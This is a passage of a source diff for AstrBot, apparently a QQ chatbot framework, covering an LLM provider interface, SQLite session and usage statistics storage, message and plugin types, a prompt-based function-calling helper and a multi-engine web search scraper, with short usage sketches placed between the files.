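session_memory["qq_12345"].append(record)

# once usage_tokens exceeds the model window minus the 300 tokens reserved for the
# completion, the oldest non-system records are evicted, as pop_record does above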
35
model/provider/provider.py
Normal file
@@ -0,0 +1,35 @@
class Provider:
    async def text_chat(self,
                        prompt: str,
                        session_id: str,
                        image_url: None = None,
                        tools: None = None,
                        extra_conf: dict = None,
                        default_personality: dict = None,
                        **kwargs) -> str:
        '''
        [require]
        prompt: 提示词
        session_id: 会话id

        [optional]
        image_url: 图片url(识图)
        tools: 函数调用工具
        extra_conf: 额外配置
        default_personality: 默认人格
        '''
        raise NotImplementedError

    async def image_generate(self, prompt, session_id, **kwargs) -> str:
        '''
        [require]
        prompt: 提示词
        session_id: 会话id
        '''
        raise NotImplementedError

    async def forget(self, session_id=None) -> bool:
        '''
        重置会话
        '''
        raise NotImplementedError
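A minimal sketch of a custom provider implementing the interface above; EchoProvider, its canned reply and the placeholder image URL are invented for illustration.

from model.provider.provider import Provider

class EchoProvider(Provider):
    '''Illustrative provider: no LLM call, just echoes the prompt back.'''

    def __init__(self):
        self.session_memory = {}

    async def text_chat(self, prompt: str, session_id: str, **kwargs) -> str:
        self.session_memory.setdefault(session_id, []).append(prompt)
        return f"你说的是:{prompt}"

    async def image_generate(self, prompt, session_id, **kwargs) -> str:
        return "https://example.com/placeholder.png"   # placeholder URL

    async def forget(self, session_id=None) -> bool:
        self.session_memory.pop(session_id, None)
        return True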
296
persist/session.py
Normal file
@@ -0,0 +1,296 @@
|
||||
import sqlite3
|
||||
import os
|
||||
import shutil
|
||||
import time
|
||||
from typing import Tuple
|
||||
|
||||
|
||||
class dbConn():
|
||||
def __init__(self):
|
||||
db_path = "data/data.db"
|
||||
if os.path.exists("data.db"):
|
||||
shutil.copy("data.db", db_path)
|
||||
conn = sqlite3.connect(db_path)
|
||||
conn.text_factory = str
|
||||
self.conn = conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
CREATE TABLE IF NOT EXISTS tb_session(
|
||||
qq_id VARCHAR(32) PRIMARY KEY,
|
||||
history TEXT
|
||||
);
|
||||
'''
|
||||
)
|
||||
c.execute(
|
||||
'''
|
||||
CREATE TABLE IF NOT EXISTS tb_stat_session(
|
||||
platform VARCHAR(32),
|
||||
session_id VARCHAR(32),
|
||||
cnt INTEGER
|
||||
);
|
||||
'''
|
||||
)
|
||||
c.execute(
|
||||
'''
|
||||
CREATE TABLE IF NOT EXISTS tb_stat_message(
|
||||
ts INTEGER,
|
||||
cnt INTEGER
|
||||
);
|
||||
'''
|
||||
)
|
||||
c.execute(
|
||||
'''
|
||||
CREATE TABLE IF NOT EXISTS tb_stat_platform(
|
||||
ts INTEGER,
|
||||
platform VARCHAR(32),
|
||||
cnt INTEGER
|
||||
);
|
||||
'''
|
||||
)
|
||||
|
||||
conn.commit()
|
||||
|
||||
def insert_session(self, qq_id, history):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_session(qq_id, history) VALUES (?, ?)
|
||||
''', (qq_id, history)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def update_session(self, qq_id, history):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_session SET history = ? WHERE qq_id = ?
|
||||
''', (history, qq_id)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def get_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
return c.fetchone()
|
||||
|
||||
def get_all_session(self):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session
|
||||
'''
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def check_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
return c.fetchone() is not None
|
||||
|
||||
def delete_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
DELETE FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def increment_stat_session(self, platform, session_id, cnt):
|
||||
# if not exist, insert
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
|
||||
if self.check_stat_session(platform, session_id):
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_stat_session SET cnt = cnt + ? WHERE platform = ? AND session_id = ?
|
||||
''', (cnt, platform, session_id)
|
||||
)
|
||||
conn.commit()
|
||||
else:
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_stat_session(platform, session_id, cnt) VALUES (?, ?, ?)
|
||||
''', (platform, session_id, cnt)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def check_stat_session(self, platform, session_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_session WHERE platform = ? AND session_id = ?
|
||||
''', (platform, session_id)
|
||||
)
|
||||
return c.fetchone() is not None
|
||||
|
||||
def get_all_stat_session(self):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_session
|
||||
'''
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def get_session_cnt_total(self):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT COUNT(*) FROM tb_stat_session
|
||||
'''
|
||||
)
|
||||
return c.fetchone()[0]
|
||||
|
||||
def increment_stat_message(self, ts, cnt):
|
||||
# 以一个小时为单位。ts的单位是秒。
|
||||
# 找到最近的一个小时,如果没有,就插入
|
||||
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
|
||||
ok, new_ts = self.check_stat_message(ts)
|
||||
|
||||
if ok:
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_stat_message SET cnt = cnt + ? WHERE ts = ?
|
||||
''', (cnt, new_ts)
|
||||
)
|
||||
conn.commit()
|
||||
else:
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_stat_message(ts, cnt) VALUES (?, ?)
|
||||
''', (new_ts, cnt)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def check_stat_message(self, ts) -> Tuple[bool, int]:
|
||||
# 换算成当地整点的时间戳
|
||||
|
||||
ts = ts - ts % 3600
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_message WHERE ts = ?
|
||||
''', (ts, )
|
||||
)
|
||||
if c.fetchone() is not None:
|
||||
return True, ts
|
||||
else:
|
||||
return False, ts
|
||||
|
||||
def get_last_24h_stat_message(self):
|
||||
# 获取最近24小时的消息统计
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_message WHERE ts > ?
|
||||
''', (time.time() - 86400, )
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def get_message_cnt_total(self) -> int:
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT SUM(cnt) FROM tb_stat_message
|
||||
'''
|
||||
)
|
||||
return c.fetchone()[0]
|
||||
|
||||
def increment_stat_platform(self, ts, platform, cnt):
|
||||
# 以一个小时为单位。ts的单位是秒。
|
||||
# 找到最近的一个小时,如果没有,就插入
|
||||
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
|
||||
ok, new_ts = self.check_stat_platform(ts, platform)
|
||||
|
||||
if ok:
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_stat_platform SET cnt = cnt + ? WHERE ts = ? AND platform = ?
|
||||
''', (cnt, new_ts, platform)
|
||||
)
|
||||
conn.commit()
|
||||
else:
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_stat_platform(ts, platform, cnt) VALUES (?, ?, ?)
|
||||
''', (new_ts, platform, cnt)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def check_stat_platform(self, ts, platform):
|
||||
# 换算成当地整点的时间戳
|
||||
|
||||
ts = ts - ts % 3600
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_platform WHERE ts = ? AND platform = ?
|
||||
''', (ts, platform)
|
||||
)
|
||||
if c.fetchone() is not None:
|
||||
return True, ts
|
||||
else:
|
||||
return False, ts
|
||||
|
||||
def get_last_24h_stat_platform(self):
|
||||
# 获取最近24小时的消息统计
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_platform WHERE ts > ?
|
||||
''', (time.time() - 86400, )
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def get_platform_cnt_total(self) -> int:
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT platform, SUM(cnt) FROM tb_stat_platform GROUP BY platform
|
||||
'''
|
||||
)
|
||||
# return c.fetchall()
|
||||
platforms = []
|
||||
ret = c.fetchall()
|
||||
for i in ret:
|
||||
# platforms[i[0]] = i[1]
|
||||
platforms.append({
|
||||
"name": i[0],
|
||||
"count": i[1]
|
||||
})
|
||||
return platforms
|
||||
|
||||
def close(self):
|
||||
self.conn.close()
|
||||
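A short sketch of the hourly bucketing used by increment_stat_message / check_stat_message above; the timestamps are arbitrary and the data/ directory is assumed to exist already.

import time
from persist.session import dbConn

db = dbConn()   # expects the data/ directory to exist

now = int(time.time())
hour_bucket = now - now % 3600   # same rounding as check_stat_message

# two calls inside the same hour accumulate into a single row
db.increment_stat_message(now, 1)
db.increment_stat_message(now + 120, 1)

print(db.get_last_24h_stat_message())
print(db.get_message_cnt_total())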
@@ -1,3 +1,19 @@
-requests~=2.27.1
-openai~=0.27.0
-qq-botpy~=1.1.2
+pydantic~=1.10.4
+aiohttp
+requests
+openai~=1.2.3
+qq-botpy
+chardet~=5.1.0
+Pillow
+GitPython
+nakuru-project
+beautifulsoup4
+googlesearch-python
+tiktoken
+readability-lxml
+baidu-aip
+websockets
+flask
+psutil
+lxml_html_clean
+SparkleLogging
BIN
resources/fonts/syst.otf
Normal file
28
type/command.py
Normal file
@@ -0,0 +1,28 @@
from typing import Union, List, Callable
from dataclasses import dataclass


@dataclass
class CommandItem():
    '''
    用来描述单个指令
    '''

    command_name: Union[str, tuple]  # 指令名
    callback: Callable  # 回调函数
    description: str  # 描述
    origin: str  # 注册来源


class CommandResult():
    '''
    用于在Command中返回多个值
    '''

    def __init__(self, hit: bool, success: bool, message_chain: list, command_name: str = "unknown_command") -> None:
        self.hit = hit
        self.success = success
        self.message_chain = message_chain
        self.command_name = command_name

    def _result_tuple(self):
        return (self.success, self.message_chain, self.command_name)
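A small sketch of describing and invoking a command with the two classes above; the /ping command and its handler are hypothetical.

from nakuru.entities.components import Plain
from type.command import CommandItem, CommandResult

def handle_ping(message: str) -> CommandResult:
    # hypothetical /ping handler
    return CommandResult(
        hit=True,
        success=True,
        message_chain=[Plain(text="pong")],
        command_name="ping",
    )

ping_item = CommandItem(
    command_name="ping",
    callback=handle_ping,
    description="连通性测试",
    origin="internal",
)

result = ping_item.callback("/ping")
print(result._result_tuple())   # (True, [Plain(...)], 'ping')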
62
type/message.py
Normal file
@@ -0,0 +1,62 @@
from enum import Enum
from typing import List
from dataclasses import dataclass
from nakuru.entities.components import BaseMessageComponent

from type.register import RegisteredPlatform
from type.types import GlobalObject


class MessageType(Enum):
    GROUP_MESSAGE = 'GroupMessage'  # 群组形式的消息
    FRIEND_MESSAGE = 'FriendMessage'  # 私聊、好友等单聊消息
    GUILD_MESSAGE = 'GuildMessage'  # 频道消息


@dataclass
class MessageMember():
    user_id: str  # 发送者id
    nickname: str = None


class AstrBotMessage():
    '''
    AstrBot 的消息对象
    '''
    tag: str  # 消息来源标签
    type: MessageType  # 消息类型
    self_id: str  # 机器人的识别id
    session_id: str  # 会话id
    message_id: str  # 消息id
    sender: MessageMember  # 发送者
    message: List[BaseMessageComponent]  # 消息链使用 Nakuru 的消息链格式
    message_str: str  # 最直观的纯文本消息字符串
    raw_message: object
    timestamp: int  # 消息时间戳

    def __str__(self) -> str:
        return str(self.__dict__)


class AstrMessageEvent():
    '''
    消息事件。
    '''
    context: GlobalObject  # 一些公用数据
    message_str: str  # 纯消息字符串
    message_obj: AstrBotMessage  # 消息对象
    platform: RegisteredPlatform  # 来源平台
    role: str  # 基本身份。`admin` 或 `member`
    session_id: int  # 会话 id

    def __init__(self,
                 message_str: str,
                 message_obj: AstrBotMessage,
                 platform: RegisteredPlatform,
                 role: str,
                 context: GlobalObject,
                 session_id: str = None):
        self.context = context
        self.message_str = message_str
        self.message_obj = message_obj
        self.platform = platform
        self.role = role
        self.session_id = session_id
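A tiny sketch of filling in an AstrBotMessage by hand, as a new platform adapter would; every field value here is a placeholder.

import time
from nakuru.entities.components import Plain
from type.message import AstrBotMessage, MessageMember, MessageType

abm = AstrBotMessage()
abm.tag = "demo"                       # hypothetical platform tag
abm.type = MessageType.FRIEND_MESSAGE
abm.self_id = "bot_001"
abm.session_id = "user_42"
abm.message_id = "msg_1"
abm.sender = MessageMember("user_42", "小明")
abm.message = [Plain(text="你好")]
abm.message_str = "你好"
abm.raw_message = None
abm.timestamp = int(time.time())

print(abm)   # __str__ dumps all fields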
27
type/plugin.py
Normal file
@@ -0,0 +1,27 @@
from enum import Enum
from dataclasses import dataclass


class PluginType(Enum):
    PLATFORM = 'platfrom'  # 平台类插件。
    LLM = 'llm'  # 大语言模型类插件
    COMMON = 'common'  # 其他插件


@dataclass
class PluginMetadata:
    '''
    插件的元数据。
    '''
    # required
    plugin_name: str
    plugin_type: PluginType
    author: str  # 插件作者
    desc: str  # 插件简介
    version: str  # 插件版本

    # optional
    repo: str = None  # 插件仓库地址

    def __str__(self) -> str:
        return f"PluginMetadata({self.plugin_name}, {self.plugin_type}, {self.desc}, {self.version}, {self.repo})"
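For reference, a sketch of the metadata a plugin might declare; the plugin name, author and repository URL are placeholders.

from type.plugin import PluginMetadata, PluginType

metadata = PluginMetadata(
    plugin_name="hello_world",                 # hypothetical plugin name
    plugin_type=PluginType.COMMON,
    author="someone",
    desc="示例插件,仅作演示",
    version="0.1.0",
    repo="https://example.com/hello_world",    # placeholder repo URL
)
print(metadata)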
46
type/register.py
Normal file
@@ -0,0 +1,46 @@
from model.provider.provider import Provider as LLMProvider
from model.platform._platfrom import Platform
from type.plugin import *
from typing import List
from types import ModuleType
from dataclasses import dataclass


@dataclass
class RegisteredPlugin:
    '''
    注册在 AstrBot 中的插件。
    '''
    metadata: PluginMetadata
    plugin_instance: object
    module_path: str
    module: ModuleType
    root_dir_name: str

    def __str__(self) -> str:
        return f"RegisteredPlugin({self.metadata}, {self.module_path}, {self.root_dir_name})"


RegisteredPlugins = List[RegisteredPlugin]


@dataclass
class RegisteredPlatform:
    '''
    注册在 AstrBot 中的平台。平台应当实现 Platform 接口。
    '''
    platform_name: str
    platform_instance: Platform
    origin: str = None  # 注册来源

    def __str__(self) -> str:
        return self.platform_name


@dataclass
class RegisteredLLM:
    '''
    注册在 AstrBot 中的大语言模型调用。大语言模型应当实现 LLMProvider 接口。
    '''
    llm_name: str
    llm_instance: LLMProvider
    origin: str = None  # 注册来源
34
type/types.py
Normal file
@@ -0,0 +1,34 @@
|
||||
from type.register import *
|
||||
from typing import List
|
||||
|
||||
class GlobalObject:
|
||||
'''
|
||||
存放一些公用的数据,用于在不同模块(如core与command)之间传递
|
||||
'''
|
||||
version: str # 机器人版本
|
||||
nick: tuple # 用户定义的机器人的别名
|
||||
base_config: dict # config.json 中导出的配置
|
||||
cached_plugins: List[RegisteredPlugin] # 加载的插件
|
||||
platforms: List[RegisteredPlatform]
|
||||
llms: List[RegisteredLLM]
|
||||
|
||||
web_search: bool # 是否开启了网页搜索
|
||||
reply_prefix: str # 回复前缀
|
||||
unique_session: bool # 是否开启了独立会话
|
||||
cnt_total: int # 总消息数
|
||||
default_personality: dict
|
||||
dashboard_data = None
|
||||
|
||||
def __init__(self):
|
||||
self.nick = None # gocq 的昵称
|
||||
self.base_config = None # config.yaml
|
||||
self.cached_plugins = [] # 缓存的插件
|
||||
self.web_search = False # 是否开启了网页搜索
|
||||
self.reply_prefix = None
|
||||
self.unique_session = False
|
||||
self.cnt_total = 0
|
||||
self.platforms = []
|
||||
self.llms = []
|
||||
self.default_personality = None
|
||||
self.dashboard_data = None
|
||||
self.stat = {}
|
||||
247
util/agent/func_call.py
Normal file
@@ -0,0 +1,247 @@
|
||||
|
||||
import json
|
||||
import util.general_utils as gu
|
||||
|
||||
import time
|
||||
|
||||
|
||||
class FuncCallJsonFormatError(Exception):
|
||||
def __init__(self, msg):
|
||||
self.msg = msg
|
||||
|
||||
def __str__(self):
|
||||
return self.msg
|
||||
|
||||
|
||||
class FuncNotFoundError(Exception):
|
||||
def __init__(self, msg):
|
||||
self.msg = msg
|
||||
|
||||
def __str__(self):
|
||||
return self.msg
|
||||
|
||||
|
||||
class FuncCall():
|
||||
def __init__(self, provider) -> None:
|
||||
self.func_list = []
|
||||
self.provider = provider
|
||||
|
||||
def add_func(self, name: str = None, func_args: list = None, desc: str = None, func_obj=None) -> None:
|
||||
if name is None or func_args is None or desc is None or func_obj is None:
|
||||
raise FuncCallJsonFormatError(
|
||||
"name, func_args, desc must be provided.")
|
||||
params = {
|
||||
"type": "object", # hardcore here
|
||||
"properties": {}
|
||||
}
|
||||
for param in func_args:
|
||||
params['properties'][param['name']] = {
|
||||
"type": param['type'],
|
||||
"description": param['description']
|
||||
}
|
||||
self._func = {
|
||||
"name": name,
|
||||
"parameters": params,
|
||||
"description": desc,
|
||||
"func_obj": func_obj,
|
||||
}
|
||||
self.func_list.append(self._func)
|
||||
|
||||
def func_dump(self, indent: int = 2) -> str:
|
||||
_l = []
|
||||
for f in self.func_list:
|
||||
_l.append({
|
||||
"name": f["name"],
|
||||
"parameters": f["parameters"],
|
||||
"description": f["description"],
|
||||
})
|
||||
return json.dumps(_l, indent=indent, ensure_ascii=False)
|
||||
|
||||
def get_func(self) -> list:
|
||||
_l = []
|
||||
for f in self.func_list:
|
||||
_l.append({
|
||||
"type": "function",
|
||||
"function": {
|
||||
"name": f["name"],
|
||||
"parameters": f["parameters"],
|
||||
"description": f["description"],
|
||||
}
|
||||
})
|
||||
return _l
|
||||
|
||||
def func_call(self, question, func_definition, is_task=False, tasks=None, taskindex=-1, is_summary=True, session_id=None):
|
||||
|
||||
funccall_prompt = """
|
||||
我正实现function call功能,该功能旨在让你变成给定的问题到给定的函数的解析器(意味着你不是创造函数)。
|
||||
下面会给你提供可能用到的函数相关信息和一个问题,你需要将其转换成给定的函数调用。
|
||||
- 你的返回信息只含json,请严格仿照以下内容(不含注释),必须含有`res`,`func_call`字段:
|
||||
```
|
||||
{
|
||||
"res": string // 如果没有找到对应的函数,那么你可以在这里正常输出内容。如果有,这里是空字符串。
|
||||
"func_call": [ // 这是一个数组,里面包含了所有的函数调用,如果没有函数调用,那么这个数组是空数组。
|
||||
{
|
||||
"res": string // 如果没有找到对应的函数,那么你可以在这里正常输出内容。如果有,这里是空字符串。
|
||||
"name": str, // 函数的名字
|
||||
"args_type": {
|
||||
"arg1": str, // 函数的参数的类型
|
||||
"arg2": str,
|
||||
...
|
||||
},
|
||||
"args": {
|
||||
"arg1": any, // 函数的参数
|
||||
"arg2": any,
|
||||
...
|
||||
}
|
||||
},
|
||||
... // 可能在这个问题中会有多个函数调用
|
||||
],
|
||||
}
|
||||
```
|
||||
- 如果用户的要求较复杂,允许返回多个函数调用,但需保证这些函数调用的顺序正确。
|
||||
- 当问题没有提到给定的函数时,相当于提问方不打算使用function call功能,这时你可以在res中正常输出这个问题的回答(以AI的身份正常回答该问题,并将答案输出在res字段中,回答不要涉及到任何函数调用的内容,就只是正常讨论这个问题。)
|
||||
|
||||
提供的函数是:
|
||||
|
||||
"""
|
||||
|
||||
prompt = f"{funccall_prompt}\n```\n{func_definition}\n```\n"
|
||||
prompt += f"""
|
||||
用户的提问是:
|
||||
```
|
||||
{question}
|
||||
```
|
||||
"""
|
||||
|
||||
# if is_task:
|
||||
# # task_prompt = f"\n任务列表为{str(tasks)}\n你目前进行到了任务{str(taskindex)}, **你不需要重新进行已经进行过的任务, 不要生成已经进行过的**"
|
||||
# prompt += task_prompt
|
||||
|
||||
# provider.forget()
|
||||
|
||||
_c = 0
|
||||
while _c < 3:
|
||||
try:
|
||||
res = self.provider.text_chat(prompt, session_id)
|
||||
if res.find('```') != -1:
|
||||
res = res[res.find('```json') + 7: res.rfind('```')]
|
||||
gu.log("REVGPT func_call json result",
|
||||
bg=gu.BG_COLORS["green"], fg=gu.FG_COLORS["white"])
|
||||
print(res)
|
||||
res = json.loads(res)
|
||||
break
|
||||
except Exception as e:
|
||||
_c += 1
|
||||
if _c == 3:
|
||||
raise e
|
||||
if "The message you submitted was too long" in str(e):
|
||||
raise e
|
||||
|
||||
invoke_func_res = ""
|
||||
|
||||
if "func_call" in res and len(res["func_call"]) > 0:
|
||||
task_list = res["func_call"]
|
||||
|
||||
invoke_func_res_list = []
|
||||
|
||||
for res in task_list:
|
||||
# 说明有函数调用
|
||||
func_name = res["name"]
|
||||
# args_type = res["args_type"]
|
||||
args = res["args"]
|
||||
# 调用函数
|
||||
# func = eval(func_name)
|
||||
func_target = None
|
||||
for func in self.func_list:
|
||||
if func["name"] == func_name:
|
||||
func_target = func["func_obj"]
|
||||
break
|
||||
if func_target is None:
|
||||
raise FuncNotFoundError(
|
||||
f"Request function {func_name} not found.")
|
||||
t_res = str(func_target(**args))
|
||||
invoke_func_res += f"{func_name} 调用结果:\n```\n{t_res}\n```\n"
|
||||
invoke_func_res_list.append(invoke_func_res)
|
||||
gu.log(f"[FUNC| {func_name} invoked]",
|
||||
bg=gu.BG_COLORS["green"], fg=gu.FG_COLORS["white"])
|
||||
# print(str(t_res))
|
||||
|
||||
if is_summary:
|
||||
|
||||
# 生成返回结果
|
||||
after_prompt = """
|
||||
有以下内容:"""+invoke_func_res+"""
|
||||
请以AI助手的身份结合返回的内容对用户提问做详细全面的回答。
|
||||
用户的提问是:
|
||||
```""" + question + """```
|
||||
- 在res字段中,不要输出函数的返回值,也不要针对返回值的字段进行分析,也不要输出用户的提问,而是理解这一段返回的结果,并以AI助手的身份回答问题,只需要输出回答的内容,不需要在回答的前面加上身份词。
|
||||
- 你的返回信息必须只能是json,且需严格遵循以下内容(不含注释):
|
||||
```json
|
||||
{
|
||||
"res": string, // 回答的内容
|
||||
"func_call_again": bool // 如果函数返回的结果有错误或者问题,可将其设置为true,否则为false
|
||||
}
|
||||
```
|
||||
- 如果func_call_again为true,res请你设为空值,否则请你填写回答的内容。"""
|
||||
|
||||
_c = 0
|
||||
while _c < 5:
|
||||
try:
|
||||
res = self.provider.text_chat(after_prompt, session_id)
|
||||
# 截取```之间的内容
|
||||
gu.log(
|
||||
"DEBUG BEGIN", bg=gu.BG_COLORS["yellow"], fg=gu.FG_COLORS["white"])
|
||||
print(res)
|
||||
gu.log(
|
||||
"DEBUG END", bg=gu.BG_COLORS["yellow"], fg=gu.FG_COLORS["white"])
|
||||
if res.find('```') != -1:
|
||||
res = res[res.find('```json') +
|
||||
7: res.rfind('```')]
|
||||
gu.log("REVGPT after_func_call json result",
|
||||
bg=gu.BG_COLORS["green"], fg=gu.FG_COLORS["white"])
|
||||
after_prompt_res = res
|
||||
after_prompt_res = json.loads(after_prompt_res)
|
||||
break
|
||||
except Exception as e:
|
||||
_c += 1
|
||||
if _c == 5:
|
||||
raise e
|
||||
if "The message you submitted was too long" in str(e):
|
||||
# 如果返回的内容太长了,那么就截取一部分
|
||||
time.sleep(3)
|
||||
invoke_func_res = invoke_func_res[:int(
|
||||
len(invoke_func_res) / 2)]
|
||||
after_prompt = """
|
||||
函数返回以下内容:"""+invoke_func_res+"""
|
||||
请以AI助手的身份结合返回的内容对用户提问做详细全面的回答。
|
||||
用户的提问是:
|
||||
```""" + question + """```
|
||||
- 在res字段中,不要输出函数的返回值,也不要针对返回值的字段进行分析,也不要输出用户的提问,而是理解这一段返回的结果,并以AI助手的身份回答问题,只需要输出回答的内容,不需要在回答的前面加上身份词。
|
||||
- 你的返回信息必须只能是json,且需严格遵循以下内容(不含注释):
|
||||
```json
|
||||
{
|
||||
"res": string, // 回答的内容
|
||||
"func_call_again": bool // 如果函数返回的结果有错误或者问题,可将其设置为true,否则为false
|
||||
}
|
||||
```
|
||||
- 如果func_call_again为true,res请你设为空值,否则请你填写回答的内容。"""
|
||||
else:
|
||||
raise e
|
||||
|
||||
if "func_call_again" in after_prompt_res and after_prompt_res["func_call_again"]:
|
||||
# 如果需要重新调用函数
|
||||
# 重新调用函数
|
||||
gu.log("REVGPT func_call_again",
|
||||
bg=gu.BG_COLORS["purple"], fg=gu.FG_COLORS["white"])
|
||||
res = self.func_call(question, func_definition)
|
||||
return res, True
|
||||
|
||||
gu.log("REVGPT func callback:",
|
||||
bg=gu.BG_COLORS["green"], fg=gu.FG_COLORS["white"])
|
||||
# print(after_prompt_res["res"])
|
||||
return after_prompt_res["res"], True
|
||||
else:
|
||||
return str(invoke_func_res_list), True
|
||||
else:
|
||||
# print(res["res"])
|
||||
return res["res"], False
|
||||
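A quick sketch of how FuncCall is fed. The provider argument is only consumed by func_call() itself, so a schema-only demo can pass None; the get_weather tool below is hypothetical:

```python
from util.agent.func_call import FuncCall

def get_weather(city: str) -> str:
    # Hypothetical tool; a real plugin would query an actual weather API here.
    return f"{city}: sunny, 25°C"

fc = FuncCall(provider=None)   # provider is only needed once func_call() is invoked
fc.add_func(
    name="get_weather",
    func_args=[{"type": "string", "name": "city", "description": "city name"}],
    desc="Look up the current weather for a city.",
    func_obj=get_weather,
)

print(fc.func_dump())   # JSON definition embedded into the self-built function-calling prompt
print(fc.get_func())    # OpenAI-style tools list used for official function-calling
```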
183
util/agent/web_searcher.py
Normal file
@@ -0,0 +1,183 @@
|
||||
import traceback
|
||||
import random
|
||||
import json
|
||||
import asyncio
|
||||
import aiohttp
|
||||
import os
|
||||
|
||||
from readability import Document
|
||||
from bs4 import BeautifulSoup
|
||||
from openai.types.chat.chat_completion_message_tool_call import Function
|
||||
from util.agent.func_call import FuncCall
|
||||
from util.search_engine_scraper.config import HEADERS, USER_AGENTS
|
||||
from util.search_engine_scraper.bing import Bing
|
||||
from util.search_engine_scraper.sogo import Sogo
|
||||
from util.search_engine_scraper.google import Google
|
||||
from model.provider.provider import Provider
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
|
||||
bing_search = Bing()
|
||||
sogo_search = Sogo()
|
||||
google = Google()
|
||||
proxy = os.environ.get("HTTPS_PROXY", None)
|
||||
|
||||
def tidy_text(text: str) -> str:
|
||||
'''
|
||||
清理文本,去除空格、换行符等
|
||||
'''
|
||||
return text.strip().replace("\n", " ").replace("\r", " ").replace("  ", " ")
|
||||
|
||||
# def special_fetch_zhihu(link: str) -> str:
|
||||
# '''
|
||||
# function-calling 函数, 用于获取知乎文章的内容
|
||||
# '''
|
||||
# response = requests.get(link, headers=HEADERS)
|
||||
# response.encoding = "utf-8"
|
||||
# soup = BeautifulSoup(response.text, "html.parser")
|
||||
|
||||
# if "zhuanlan.zhihu.com" in link:
|
||||
# r = soup.find(class_="Post-RichTextContainer")
|
||||
# else:
|
||||
# r = soup.find(class_="List-item").find(class_="RichContent-inner")
|
||||
# if r is None:
|
||||
# print("debug: zhihu none")
|
||||
# raise Exception("zhihu none")
|
||||
# return tidy_text(r.text)
|
||||
|
||||
async def search_from_bing(keyword: str) -> str:
|
||||
'''
|
||||
tools: 网页搜索(依次尝试 Google、Bing、Sogo 搜索引擎)
|
||||
'''
|
||||
logger.info("web_searcher - search_from_bing: " + keyword)
|
||||
results = []
|
||||
try:
|
||||
results = await google.search(keyword, 5)
|
||||
except BaseException as e:
|
||||
logger.error(f"google search error: {e}, try the next one...")
|
||||
if len(results) == 0:
|
||||
logger.debug("search google failed")
|
||||
try:
|
||||
results = await bing_search.search(keyword, 5)
|
||||
except BaseException as e:
|
||||
logger.error(f"bing search error: {e}, try the next one...")
|
||||
if len(results) == 0:
|
||||
logger.debug("search bing failed")
|
||||
try:
|
||||
results = await sogo_search.search(keyword, 5)
|
||||
except BaseException as e:
|
||||
logger.error(f"sogo search error: {e}")
|
||||
if len(results) == 0:
|
||||
logger.debug("search sogo failed")
|
||||
return "没有搜索到结果"
|
||||
ret = ""
|
||||
idx = 1
|
||||
for i in results:
|
||||
logger.info(f"web_searcher - scraping web: {i.title} - {i.url}")
|
||||
try:
|
||||
site_result = await fetch_website_content(i.url)
|
||||
except:
|
||||
site_result = ""
|
||||
site_result = site_result[:600] + "..." if len(site_result) > 600 else site_result
|
||||
ret += f"{idx}. {i.title} \n{i.snippet}\n{site_result}\n\n"
|
||||
idx += 1
|
||||
return ret
|
||||
|
||||
|
||||
async def fetch_website_content(url):
|
||||
header = dict(HEADERS)  # copy, so the shared HEADERS template is not mutated
|
||||
header.update({'User-Agent': random.choice(USER_AGENTS)})
|
||||
async with aiohttp.ClientSession() as session:
|
||||
async with session.get(url, headers=header, timeout=6, proxy=proxy) as response:
|
||||
